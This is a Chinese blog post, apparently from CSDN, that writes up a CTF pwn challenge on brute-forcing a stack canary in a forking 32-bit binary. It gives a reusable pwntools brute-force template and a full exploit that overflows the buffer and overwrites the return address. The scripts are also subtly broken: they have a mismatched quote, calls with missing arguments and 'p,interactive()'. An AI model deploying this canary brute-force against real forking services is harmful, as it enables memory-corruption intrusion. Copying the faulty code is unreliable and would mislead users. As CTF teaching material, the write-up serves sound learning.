PWN-爆破Canary

最新推荐文章于 2024-02-10 23:54:03 发布
最新推荐文章于 2024-02-10 23:54:03 发布
阅读量813 收藏 3
点赞数 1
分类专栏: PWN 文章标签: c语言 python 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53394081/article/details/130315799
版权

爆破canary

原理
  • 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。
  • 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。
  • 我们可以利用这样的特点,彻底逐个字节将Canary爆破出来。
题目分析
检查保护

32位程序,开启了canary保护和NX保护,将文件放入ida中
在这里插入图片描述

ida

在这里插入图片描述

分析可知看出,main函数中存在fork函数,这是爆破canary的重点

fun()

进入fun()函数
在这里插入图片描述

  • 发现read(0, buf, 0x78u);通过对栈段的查看,我们可以输入0x78的内容

  • 但是buf的空间为:0x70-0xc=0x64

  • 在这里插入图片描述

  • 因此可以发生栈溢出覆盖其他变量,其中v2就是保存的Canary变量

解题思路
  • 一位一位的去爆破Canary,使用栈溢出填充垃圾字符,直到Canary ,然后再尝试填充Canary
  • 若Canary正确,则进行下一位的爆破
  • 若Canary错误,程序会执行fork重新运行

注意

  • Canary的形式填充到寄存器中的形式为:aaaax\00
爆破Canary的通用模板
#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386',os='linux')
local = 1
elf = ELF()

if local:
    p = process()
    #libc = elf.libc
    
else:
    p =remote()
    libc = ELF()
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
    for i in range(256):
        print"正在爆破Canary的第” + str(k+1)+"位"
        print"当前的字符为"+ chr(i)
        payload=b'a'*100 + canary + chr(i)
        print "当前payload为:",payload
        p.send(b'a'*100 + canary +chr(i))
        data = p.recvuntil("welcome\n")
        print data
        if "sucess" in data:
            canary += chr(i)
            print "Canary is:" + canary
            break
本题exp

在这里插入图片描述

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386',os='linux')
local = 1
elf = ELF()

if local:
    p = process()
    #libc = elf.libc
    
else:
    p =remote()
    libc = ELF()
p.recvuntil('welcome\n')
canary = '\x00'
for k in range(3):
    for i in range(256):
        print"正在爆破Canary的第” + str(k+1)+"位"
        print"当前的字符为"+ chr(i)
        payload=b'a'*100 + canary + chr(i)
        print "当前payload为:",payload
        p.send(b'a'*100 + canary +chr(i))
        data = p.recvuntil("welcome\n")
        print data
        if "sucess" in data:
            canary += chr(i)
            print "Canary is:" + canary
            break
addr = 0x0804863B
payload = b'A'*100 + canary + b'A'*12 + p32(addr)

p.send(payload)
p,interactive()
ksw0rd
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
针对简单Pwn溢出题的爆破
Rog's Blog
04-19 977
爆破大法好 例子:BUUCTF rip 首先得到源程序pwn1 file pwn1 checksec pwn1 啥也没有,很好 然后拖到IDA64分析一波 发现漏洞函数,地址为 0x401186 ,很好 祭出脚本,开始爆破 from pwn import * def brute(i): payload=b'a'*i+p64(0x401186) p=remote('node3.buuoj.cn',28460) p.sendline(payload) p.interact
脚本积累:使用pwntools库进行爆破
sirrior的博客
10-23 144
【代码】脚本积累:使用pwntools库进行爆破
CTF-PWN-沙箱逃脱-【侧信道爆破】(2021-蓝帽杯初赛-slient)
最新发布
llovewuzhengzi的博客
02-10 1539
如果比较成功了,那么程序将进入死循环(我们可以通过time这个模块来获取时间戳的差值),比如时间超过2秒那么我们对于flag的一个字节就爆破成功,超过两秒的原因是在未出现异常时设置了持续时间3秒的接收的操作,持续三秒后时间间隔肯定大于2秒,而出现异常的也就是没进入循环的(比较错误的)会出现异常。侧信道攻击是一种非正常的攻击手段,是一种利用计算机不经意间发出的声音来判断计算机的执行情况,比如通过散热器的响声大小来判断计算机所运行程序的复杂性;此为系统的分页大小,不一定会和硬件分页大小相同。
pwn中 one-by-one 爆破 Canary
Jonas_brown的博客
10-28 406
对于 Canary,虽然每次进程重启后的 Canary 不同 (相比 GS,GS 重启后是相同的),但是同一个进程中的不同线程的 Canary 是相同的, 并且 通过 fork 函数创建的子进程的 Canary 也是相同的,因为 fork 函数会直接拷贝父进程的内存。我们可以利用这样的特点,彻底逐个字节将 Canary 爆破出来。 在著名的 offset2libc 绕过 linux64bit 的所有保护的文章中,作者就是利用这样的方式爆破得到的 Canary: 这是爆破的 Python 代码:
PWN-canary学习
苗_的博客
02-10 1517
先简单介绍一下canaryCanary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
pwn-200题目文件
02-16
pwn-200题目文件
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
dictionary:来自pwn硬糖师傅的爆破字典
05-20
dictionary 来自pwn硬糖师傅的爆破字典 ---非最终版
Canary学习(爆破Canary
至臻求学,胸怀云月
01-30 3751
one-by-one 爆破Canary原理 对于Canary,虽然每次进程重启后Canary不同,但是同一个进程中的不同线程的Cannary是相同的,并且通过fork函数创建的子进程中的canary也是相同的,因为fork函数会直接拷贝父进程的内存。 最低位为0x00,之后逐次爆破,如果canary爆破不成功,则程序崩溃;爆破成功则程序进行下面的逻辑。由此可判断爆破是否成功。 我们可以利用这样的...
ctf php fork,CTF PWN 总结
weixin_42347873的博客
03-12 278
这个很久总结的了,基本很久没打比赛了,现在发出来了—— 20190903本文分为信息泄露和漏洞利用技术,因为很多时候信息泄露都是通用,下面的这两部分会重合信息泄露程序本来就给你泄露就再好不过了利用wrtite,puts,printf等泄露利用%s这个遇到00才停止的可能可以泄露(strlen,strdup等都需要关注)格式化字符串%x或这%p泄露uaf的任意读取smallbin(unsortbin...
CTF中的PWN——绕canary防护1(32bit 格式化字符串漏洞leak canary 栈溢出)
壊壊的诱惑你的博客
09-29 1194
前言: 金丝雀: canary就像哨兵一样,值由程序运行时随机产生。在函数返回之前,程序检测这个值以确认栈未被破坏,达到避免攻击的目的。程序会使用fs:x来进行保护,这个地址指向了一个我们无法看到的随机值,并且fs是一个由内核维护的结构。 如果金丝雀(canary)的值被修改了,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数会调用__stack_chk_f...
【pwn学习】Canary的各种绕过姿势
Morphy_Amo的博客
12-24 5437
Canary各种绕过姿势
CTF pwn/re手在学习过程中的零碎操作积累
lifanxin的博客
09-06 1472
零碎操作积累概述使用指定版本的libc运行pwn题使用指定版本的libc编译源程序总结 概述   谨以此片文章为我那不争气的记性做个记录,随便造福大家,另外如果各位看官也有些骚操作或者基操的话,也请不吝赐教,留言评论,在下定临表涕零,感激不尽。 使用指定版本的libc运行pwn题   这里给几个下libc的网站: ubuntu glibc官网 清华大学开源镜像站   使用指定版本libc运行pwn题的终端操作: # 指定libc $ LD_PRELOAD=/usr/local/libc/libc-2.2
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 796
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJ 做pwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
CANARY爆破
aptx4869_li的博客
12-24 3057
小白一枚最近开始上手搞pwn,不断认识到一些新的知识,感觉这个CANARY爆破挺有意思,估计以后也会常用,写一篇博客记录一下。 主要是向大佬学习,然后看了他们的博客,自己在一点点分析出来,可能比较啰嗦,但尽力讲的细致一点,也方便之后的小白理解。 本文是向这位大佬学习: http://0x48.pw/2017/03/14/0x2d/
[RoarCTF2019]RSA
qq_61774705的博客
05-15 719
1.题目 # A=(((y%x)**5)%(x%y))**2019+y**316+(y+1)/x # p=next_prime(z*x*y) # q=next_prime(z) # A = 26833491826787145242474695127934760098610147810049249054841274803081613777681928680615618865770486464323821289608814874634274141761144868858306939594049897432
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值